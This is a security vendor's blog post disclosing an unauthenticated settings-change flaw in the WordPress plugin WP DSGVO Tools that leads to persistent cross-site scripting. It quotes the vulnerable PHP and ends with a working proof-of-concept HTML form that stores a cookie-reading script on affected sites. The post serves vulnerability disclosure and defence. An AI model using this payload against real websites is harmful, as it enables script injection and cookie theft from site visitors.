Login
22 Sep 2021

Recently Closed WordPress Plugin With 30,000+ Installs Contains Type of Vulnerability Hackers Target

The WordPress plugin WP DSGVO Tools (GDPR) was closed on the WordPress Plugin Directory on Monday. That is one of the 1,000 most popular plugins with 30,000+ installs, so we were alerted to its closure. While we were looking in to the plugin to see if there were any serious vulnerabilities that we should be warning users of the plugin that also use our service, we found just such a vulnerability in the plugin. The plugin has a settings change vulnerability that leads to a persistent cross-site scripting (XSS) vulnerability, which would allow an attacker to cause JavaScript code to be run on the website. The latter vulnerability is a type that hackers are known to target.

We tested and confirmed that our upcoming firewall plugin for WordPress protects against the exploitation of the persistent cross-site scripting (XSS) vulnerability.

A new version of the plugin was submitted after the plugin was closed, which indicates security fixes were being made:

  • improved sanitation and escaping
  • updated 3rd party libraries
  • removed short tags

That didn’t fix the issue we found, but it does limit the scope of it, at least with the instance of it that we confirmed was vulnerable.

This is the second time we have found a serious vulnerability in the plugin and third time we have found a vulnerability in it, so it would probably be best to avoid this plugin since the developer seems uninterested or unable to properly secure it.

Settings Change to Persistent Cross-Site Scripting (XSS)

The plugin has numerous classes that extend the class SPDSGVOIntegration. The register() function of that class makes the function viewSubmit() from those classes available through WordPress AJAX functionality to anyone logged in to WordPress as well as anyone not logged in to WordPress:

19
20
21
22
23
24
25
26

public static function register(){
	$class = get_called_class();
	$self = new $class();
 
	if(method_exists($self, 'viewSubmit')){
		$action = $class::action();
		add_action("wp_ajax_{$action}", array($self, 'viewSubmit'));
		add_action("wp_ajax_nopriv_{$action}", array($self, 'viewSubmit'));

It doesn’t look like they should be made accessible to those not logged in to WordPress.

With at least some of those classes, the viewSubmit() function saves settings without doing any security checks. So anyone is able to change the relevant settings. Here is one such example of that from the file /includes/integrations/statistics/matomo/class-sp-dsgvo-matomo-integration.php:

25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

public function viewSubmit(){
 
	$settings = SPDSGVOMatomoApi::getInstance()->getSettings();
 
	$settings['enabled'] = $this->get( $this->slug.'_enable', '0');
	$settings['propertyId'] = $this->get($this->slug.'_tag_number', '');
	$settings['implementationMode'] = $this->get( $this->slug.'_implementationMode', '');
	$settings['meta']['agency'] = $this->get( $this->slug.'_meta_agency', '');
	$settings['showAsTechMandatory'] = $this->get( $this->slug.'_showAsTechMandatory', '0');
	$settings['useOwnCode'] = '1';//$this->get($this->slug.'_own_code', '1');
	$settings['usedTagmanager'] = $this->get( $this->slug.'_usedTagmanager', '');
	if ($settings['useOwnCode'] == '1')
	{
		$settings['jsCode'] = $this->get($this->slug.'_code', SPDSGVOMatomoApi::getInstance()->getDefaultJsCode($settings['propertyId']));
	} else
	{
		$settings['jsCode'] = $this->get(SPDSGVOMatomoApi::getInstance()->getDefaultJsCode($settings['propertyId']));
	}
 
	SPDSGVOMatomoApi::getInstance()->setSettings($settings);
 
	$this->redirectBack();
}

There is no sanitization or validation in that code. Not that it would matter here, as one of the settings is intended to contain JavaScript code. As the proof of concept below confirms, the JavaScript code saved there is output on frontend pages of the website.

WordPress Causes Full Disclosure

Because of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.) You can notify the developer of this issue on the forum as well. Hopefully, the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

The following proof of concept will cause an alert box with any available cookies to be shown on a post or page with the shortcode “privacy_policy” (it would also be shown on other pages loaded content from the plugin).

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=SPDSGVO-integration-matomo" method="POST">
<input type="hidden" name="matomo_enable" value="1" />
<input type="hidden" name="matomo_implementationMode" value="on-premises" />
<input type="hidden" name="matomo_code" value="<script>alert(document.cookie);</script>" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

No related posts.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Need Continued Support for a Closed Plugin?

Does your website depend on a WordPress plugin that is no longer being supported by the original developer? With our Abandoned WordPress Plugin Maintenance Service, we can maintain the plugin for you, so you can safely use the plugin going forward.

Leave a Reply

Your email address will not be published.